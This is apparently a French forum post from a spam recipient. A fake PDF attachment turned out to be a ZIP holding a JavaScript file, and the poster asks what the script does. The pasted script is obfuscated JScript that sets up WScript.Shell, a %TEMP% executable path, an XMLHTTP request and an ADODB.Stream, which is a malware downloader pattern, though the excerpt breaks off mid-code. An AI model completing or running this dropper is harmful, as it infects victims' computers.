Alors que je suis en Ile de France, un loustic de Turquie a allégué que
j'aurais envoyé de Grande Bretagne à un destinataire lui aussi en Grande
Bretagne, un fichier PDF avec le texte d'accompagnement "Image data in
PDF format has been attached to this email."
En jetant un coup d'œil il s'avère que ce fichier PDF est un fichier ZIP
qui contient un fichier d'extension js avec le contenu ci-après à la fin.
En essayant de décoder les ASCII ça n'éclaire pas beaucoup (je me suis
limité aux quatre premières variables) :
Bon alors on est bien d'accord que c'est une histoire de loustic (après
tout j'ai bien reçu la semaine dernière une facture pour des prestations
d'accompagnement, qui émanait d'un collège en Israël ; nul doute que se
trouvent en Israël des personnes qui pourraient prétendre à facturer
leur présence, mais avant de payer je veux voir ;) ), mais je serais
assez curieux de savoir ce que pourrait bien faire ce script si il me
venait l'étrange idée de double-cliquer dessus.
Si quelqu'un s'y retrouve ?
Nous sommes bien d'accord que c'est très bien que les hébergeurs se
soient préoccupés de filtrer efficacement, à une époque je ne me serais
pas amusé à tout ça sur chaque spam que je recevais.
Voilà le contenu de la chose :
_______________________________
var YQPYqGFs= this['A\u0063\u0074\u0069v\u0065\u0058Obje\u0063\u0074'];
var eOrMRkJ = new
YQPYqGFs('W\u0053cr\u0069\u0070t\u002E\u0053h\u0065\u006Cl');
var vEiAQ =
eOrMRkJ['\u0045\u0078\u0070\u0061\u006E\u0064\u0045n\u0076\u0069\u0072\u006F\u006Em\u0065\u006E\u0074\u0053\u0074\u0072\u0069\u006Eg\u0073']('%\u0054E\u004D\u0050%')
+ '\u002F\u0046\u0065M\u0071\u0051yRM.e\u0078\u0065';
var YaVmudBF = new
YQPYqGFs('\u004DS\u0058\u004D\u004C\u0032\u002E\u0058M\u004C\u0048T\u0054\u0050');
YaVmudBF['\u006Fn\u0072\u0065\u0061\u0064ys\u0074\u0061\u0074ec\u0068\u0061\u006E\u0067e']
= function() {
if (YaVmudBF['\u0072\u0065ad\u0079st\u0061\u0074\u0065'] === 4) {
var VWIDQ = new
YQPYqGFs('\u0041\u0044\u004F\u0044\u0042.\u0053\u0074r\u0065\u0061\u006D');
VWIDQ['o\u0070e\u006E']();
VWIDQ['\u0074\u0079pe'] = 1;